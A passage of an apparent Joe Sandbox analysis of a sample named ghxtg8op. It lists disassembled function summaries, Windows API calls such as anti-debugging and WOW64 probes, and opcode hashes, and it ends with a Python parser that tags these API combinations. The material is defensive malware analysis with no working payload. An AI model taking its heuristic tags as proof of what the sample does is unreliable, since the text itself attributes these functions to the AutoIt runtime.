                              • Part of subcall function 00D41D35: GetStockObject.GDI32(00000011), ref: 00D41D87
                              • Part of subcall function 00D41D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00D41D91
                            • GetWindowRect.USER32(00000000,?), ref: 00DC6C71
                            • GetSysColor.USER32(00000012,?,?,static,?,00000000,?,?,?,00000001,?,?,00000001,?), ref: 00DC6C8B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            • API String ID: 1983116058-2160076837
                            • Opcode ID: db7db084479b41d674ed28bced9dc27c88275c0dc1794ff636d98a990e6f47bd
                            • Instruction ID: 6e5c7762eaf9d81744bad529900f294eee580eba07657a3fab48e58dccea3d85
                            • Opcode Fuzzy Hash: db7db084479b41d674ed28bced9dc27c88275c0dc1794ff636d98a990e6f47bd
                            • Instruction Fuzzy Hash: EC21567262020AAFDF04DFA8CD45EEA7BA9FB08314F044629F995E3250D735E861DB60
                            APIs
                            • GetWindowTextLengthW.USER32(00000000,?,?,edit,?,00000000,?,?,?,?,?,?,00000001,?), ref: 00DC69A2
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00DC69B1
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: 7b5ec9da69bc919b2e6be9c7bb50c32cf3304a8ac746fd894c1ab29c19fc56a3
                            • Instruction ID: 892ad2131704dc3e2f859e6366b820d99c4bea7d28880b617b1d9122288ad90b
                            • Opcode Fuzzy Hash: 7b5ec9da69bc919b2e6be9c7bb50c32cf3304a8ac746fd894c1ab29c19fc56a3
                            • Instruction Fuzzy Hash: AA115B7151020AABEB108F64DC41FEB366AEB05374F544728FAA5971E0CB31DC919B70
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: a10cbf7f238b1c8ee6fe2f3fd7f0e4d6f329d902416851901f76c9921df99d62
                            • Instruction ID: a801344ea42a8315f75e93f3e1d30891e015b4fa15693cea459a350e8c9a3cb3
                            • Opcode Fuzzy Hash: a10cbf7f238b1c8ee6fe2f3fd7f0e4d6f329d902416851901f76c9921df99d62
                            • Instruction Fuzzy Hash: 86119032A05214ABDF34DB9ED844BBA77B8EB86310F184021E955E7290D770ED0ACBB1
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DB222C
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DB2255
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Internet$OpenOption
                            • String ID: <local>
                            • API String ID: 942729171-4266983199
                            • Opcode ID: f8df9921c478629b8e1d5a57e786101d797b45bd54e5f7488b8a719b882719f8
                            • Instruction ID: 23421ef8f1992e559ec909747a51e0ffd2ea7011063ab28b9e896073eec77244
                            • Opcode Fuzzy Hash: f8df9921c478629b8e1d5a57e786101d797b45bd54e5f7488b8a719b882719f8
                            • Instruction Fuzzy Hash: 76110272501226FEDB248F118C84EFBFBA8FF06351F10862AF946D6140D3709990D6F0
                            APIs
                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00D43C14,00E052F8,?,?,?), ref: 00D5096E
                              • Part of subcall function 00D47BCC: _memmove.LIBCMT ref: 00D47C06
                            • _wcscat.LIBCMT ref: 00D84CB7
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FullNamePath_memmove_wcscat
                            • String ID: S
                            • API String ID: 257928180-3334745618
                            • Opcode ID: c4b9e6b2d1360f261671f9555f4846c3e120ac80e1890d4aeba5ef4ec187ac01
                            • Instruction ID: 30d48a73a0cee0f1c6dfb44d31efc46e7ff679907c3be41e39d5cfde3cc9be58
                            • Opcode Fuzzy Hash: c4b9e6b2d1360f261671f9555f4846c3e120ac80e1890d4aeba5ef4ec187ac01
                            • Instruction Fuzzy Hash: 451152359056099BCF41EBA48806EDA7BA8FF08351B0445A5BD89D7289EB7496888F31
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D98E73
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 1476acd85a66238123e6322e33259f7c2bc7a44a1b5d250e05d94eee73673903
                            • Instruction ID: 8b65538470e37caa14184f89b09cbe49fcca023c82065b64f081fd2b97483983
                            • Opcode Fuzzy Hash: 1476acd85a66238123e6322e33259f7c2bc7a44a1b5d250e05d94eee73673903
                            • Instruction Fuzzy Hash: 0901F171A01219AB8F14EBA4CC518FE7369EF06320B040A19F872573E2DF325808D670
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 00D98D6B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: 1232b1ee8db162cff94664ac5d4cb30387581fca1235eb1d13ecfe08217ee334
                            • Instruction ID: d05f3bd58c377f8557092555e096d38b998bc6689bd2e97019267b1bd6504d5c
                            • Opcode Fuzzy Hash: 1232b1ee8db162cff94664ac5d4cb30387581fca1235eb1d13ecfe08217ee334
                            • Instruction Fuzzy Hash: EE01F2B1A41109AFDF14EBE0C952EFE73A8DF16740F140019B802632E2DF249E0CE6B1
                            APIs
                              • Part of subcall function 00D47DE1: _memmove.LIBCMT ref: 00D47E22
                              • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 00D98DEE
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassMessageNameSend_memmove
                            • String ID: ComboBox$ListBox
                            • API String ID: 372448540-1403004172
                            • Opcode ID: c731eadc0737d19c26278cb7bbf21135909028d333f37bbe070ea556a1be7a4b
                            • Instruction ID: a1ed98d516d917e05e910fb3bce740fe08a4f6a822b05b3f4ae496be0a273a6b
                            • Opcode Fuzzy Hash: c731eadc0737d19c26278cb7bbf21135909028d333f37bbe070ea556a1be7a4b
                            • Instruction Fuzzy Hash: 5901F271B41109ABDF10EBA4C942EFE77A8CF16740F144015B801A3292DE258E08E6B1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: __calloc_crt
                            • String ID: @B
                            • API String ID: 3494438863-3690976569
                            • Opcode ID: 6c48b6e13d21a36d082624bbf59783eabc67ab84ba12279abfb1e81166b7570f
                            • Instruction ID: d5b77ae83e54c9e1480d2bf159726f828d8267a9e5e8d6c3efa10d767aa7e92a
                            • Opcode Fuzzy Hash: 6c48b6e13d21a36d082624bbf59783eabc67ab84ba12279abfb1e81166b7570f
                            • Instruction Fuzzy Hash: F6F04472204616DFEB649F5EBC51B7327A5EB00730B54051AE600DE1A0EB71C8898EF4
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: ClassName_wcscmp
                            • String ID: #32770
                            • API String ID: 2292705959-463685578
                            • Opcode ID: ec86ddfd1d23eaecb1fd89b8921ee41f496b314f8906d25401c7d94212b8017a
                            • Instruction ID: 6114cd2c758b17e68dc0407df1414842bc4bae644980c69ef87d0c21639fbb63
                            • Opcode Fuzzy Hash: ec86ddfd1d23eaecb1fd89b8921ee41f496b314f8906d25401c7d94212b8017a
                            • Instruction Fuzzy Hash: 27E09232A042292BD7209B99AC49FA7FBACEB85B71F010066FD04D7151DA609A598BF1
                            APIs
                              • Part of subcall function 00D7B314: _memset.LIBCMT ref: 00D7B321
                              • Part of subcall function 00D60940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00D7B2F0,?,?,?,00D4100A), ref: 00D60945
                            • IsDebuggerPresent.KERNEL32(?,?,?,00D4100A), ref: 00D7B2F4
                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D4100A), ref: 00D7B303
                            Strings
                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7B2FE
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                            • API String ID: 3158253471-631824599
                            • Opcode ID: b8bdff2860ceaf3d21e4a60b7617b58a2eb3abe7e1b0399bdffbb715272d6ee6
                            • Instruction ID: bbd047c86e610c0e07ab2ec8fe9f6811d928c2a390fc37c7da17b40f877b5512
                            • Opcode Fuzzy Hash: b8bdff2860ceaf3d21e4a60b7617b58a2eb3abe7e1b0399bdffbb715272d6ee6
                            • Instruction Fuzzy Hash: 77E06D70200B528FD720AF29E4047427AE8EF00714F04892EE48AC7350EBB4D488CBB1
                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D81775
                              • Part of subcall function 00DBBFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00DBBFFE
                              • Part of subcall function 00DBBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00D8195E,?), ref: 00DBC010
                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D8196D
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                            • String ID: WIN_XPe
                            • API String ID: 582185067-3257408948
                            • Opcode ID: 30facede1f56295a861aefd90ab5419ffd2f1f6240b6072025a4b0f50fdeed91
                            • Instruction ID: 23342087313c1ada17c3d8f814c8c38ff6f75fe12c1fe863a0a7cf2f97d30d6a
                            • Opcode Fuzzy Hash: 30facede1f56295a861aefd90ab5419ffd2f1f6240b6072025a4b0f50fdeed91
                            • Instruction Fuzzy Hash: 7EF0C9B480110ADFDB15EB91CD84AECBBF8BB18301F540499E142A21A0D7B58F8ADF70
                            APIs
                            • FindWindowW.USER32 ref: 00DC59AE
                            • PostMessageW.USER32 ref: 00DC59B5
                              • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: dcd593ba250fd7121d9684ea4f5153dabaac6de44334353bde041bd16fac696a
                            • Instruction ID: a2104141f88a8b6f2d6918ea4229db609a91f202a267982b7dd9c6cf022e670c
                            • Opcode Fuzzy Hash: dcd593ba250fd7121d9684ea4f5153dabaac6de44334353bde041bd16fac696a
                            • Instruction Fuzzy Hash: 72D0C9313C07127BE664AB70AC0BFD66625AB05B51F010825B346EA2D0C9E4A800C678
                            APIs
                            • FindWindowW.USER32 ref: 00DC596E
                            • PostMessageW.USER32 ref: 00DC5981
                              • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.486436880.0000000000D41000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D40000, based on PE: true
                            • Associated: 00000005.00000002.486429614.0000000000D40000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DCF000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486469254.0000000000DF4000.00000002.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486498391.0000000000DFE000.00000004.00000001.01000000.00000004.sdmp
                            • Associated: 00000005.00000002.486505856.0000000000E07000.00000002.00000001.01000000.00000004.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_d40000_ghxtg8op.jbxd
                            Similarity
                            • API ID: FindMessagePostSleepWindow
                            • String ID: Shell_TrayWnd
                            • API String ID: 529655941-2988720461
                            • Opcode ID: cbac1858062ed0231ded199e4fe4d44f3d94056c30fab0108a03a3a4bff9a352
                            • Instruction ID: d56a3996331d41dd80193cd98b93fb129914b3cc8a83620ce9e57b6342c8c080
                            • Opcode Fuzzy Hash: cbac1858062ed0231ded199e4fe4d44f3d94056c30fab0108a03a3a4bff9a352
                            • Instruction Fuzzy Hash: 64D0C931394712BBE664AB70AC0BFE66A25AB01B51F010825B34AEA2D0C9E49800C674
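The entries above are raw Joe Sandbox function summaries. To make a dump of this length reviewable, the following added example (not Joe Sandbox code and not part of this report) parses the "APIs", "Strings" and "Similarity" sections of each entry, decodes the SendMessageW message numbers that appear in this section (0x180, 0x182, 0x1A2 are LB_ADDSTRING, LB_DELETESTRING and LB_FINDSTRINGEXACT from winuser.h), and applies a few analyst heuristics to the API-plus-string combinations seen here: IsDebuggerPresent inside the CAtlBaseModule initializer, the GetProcAddress lookup of GetSystemWow64DirectoryW, FindWindowW on Shell_TrayWnd, and GetClassNameW followed by SendMessageW on ListBox/ComboBox controls. The tagging rules are assumptions made for this example, not Joe Sandbox signatures, and the sample text is a constructed excerpt of four entries copied from this page.

```python
"""Parse Joe Sandbox function-summary entries and tag notable API/string combinations.

Added example for this page, not Joe Sandbox code. SAMPLE is a constructed excerpt of
four entries from this report; RULES are analyst heuristics, not Joe Sandbox signatures.
"""
import re

SAMPLE = """\
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,00D4100A), ref: 00D7B2F4
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D4100A), ref: 00D7B303
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D7B2FE
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
• String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
APIs
• GetSystemDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D81775
  • Part of subcall function 00DBBFF0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00DBBFFE
  • Part of subcall function 00DBBFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW,?,00D8195E,?), ref: 00DBC010
• FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00D8196D
Similarity
• API ID: Library$AddressDirectoryFreeLoadProcSystem
• String ID: WIN_XPe
APIs
• FindWindowW.USER32 ref: 00DC59AE
• PostMessageW.USER32 ref: 00DC59B5
  • Part of subcall function 00DA5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00DA52BC
Similarity
• API ID: FindMessagePostSleepWindow
• String ID: Shell_TrayWnd
APIs
  • Part of subcall function 00D9AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00D9AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00D98E73
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
"""

HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# One call line, with or without an argument list, optionally marked as a subcall.
CALL_RE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
STRING_RE = re.compile(r"•\s*(?P<s>.*), xrefs:\s*[0-9A-F]+")
ID_RE = re.compile(r"•\s*(?P<key>API ID|String ID):\s*(?P<val>.*)")
# Message numbers seen in this report's SendMessageW calls (values from winuser.h).
LB_MESSAGES = {0x180: "LB_ADDSTRING", 0x182: "LB_DELETESTRING", 0x1A2: "LB_FINDSTRINGEXACT"}
# (required API, substring required in the entry's strings or arguments (None = any), tag)
RULES = [
    ("IsDebuggerPresent", None, "anti-debug check"),
    ("OutputDebugStringW", "CAtlBaseModule", "ATL module init (library code, not payload logic)"),
    ("GetProcAddress", "GetSystemWow64DirectoryW", "WOW64 / 64-bit OS probe via dynamic import"),
    ("FindWindowW", "Shell_TrayWnd", "taskbar window lookup"),
    ("SendMessageW", "ListBox", "list/combo control automation"),
]

def parse_entries(text):
    """One dict per 'APIs' header: its call lines, string lines and Similarity IDs."""
    entries, section, cur = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:  # section header; 'APIs' opens a new entry
            section = line
            if line == "APIs":
                cur = {"calls": [], "strings": [], "api_id": None, "string_id": None}
                entries.append(cur)
        elif cur is not None and section == "APIs" and (m := CALL_RE.search(line)):
            cur["calls"].append(m.groupdict())
        elif cur is not None and section == "Strings" and (m := STRING_RE.search(line)):
            cur["strings"].append(m.group("s"))
        elif cur is not None and section == "Similarity" and (m := ID_RE.search(line)):
            cur["api_id" if m.group("key") == "API ID" else "string_id"] = m.group("val")
    return entries

def decode_message(raw):
    """Name the Msg argument (second parameter) of a SendMessageW call; '?' means unresolved."""
    try:
        return LB_MESSAGES.get(int(raw, 16), f"msg 0x{int(raw, 16):X}")
    except ValueError:
        return f"msg {raw}"

def tag_entry(entry):
    """Apply RULES to one entry and decode the message number of each SendMessageW call."""
    apis = {c["api"] for c in entry["calls"]}
    haystack = " ".join(entry["strings"] + [entry["string_id"] or ""]
                        + [c["args"] or "" for c in entry["calls"]])
    tags = [tag for api, needle, tag in RULES
            if api in apis and (needle is None or needle in haystack)]
    for c in entry["calls"]:
        if c["api"] == "SendMessageW" and c["args"] and "," in c["args"]:
            tags.append("SendMessageW " + decode_message(c["args"].split(",")[1].strip()))
    return tags

def summarize(text):
    """[(API ID, [tags])] for every entry in the dump; run on SAMPLE to see the four verdicts."""
    return [(e["api_id"], tag_entry(e)) for e in parse_entries(text)]
```

Calling summarize(SAMPLE) yields one tag list per entry. Note the caveat the tags carry: the functions in this part of the dump belong to the AutoIt runtime and the ATL library code it links (the CAtlBaseModule string and the ListBox/ComboBox control handling are standard interpreter code), so a hit here says what the interpreter can do, not what the embedded script does. Comparing the Opcode ID and Instruction Fuzzy Hash values against a clean AutoIt interpreter of the same version is the quickest way to separate runtime functions from script-driven behaviour before spending time on any entry.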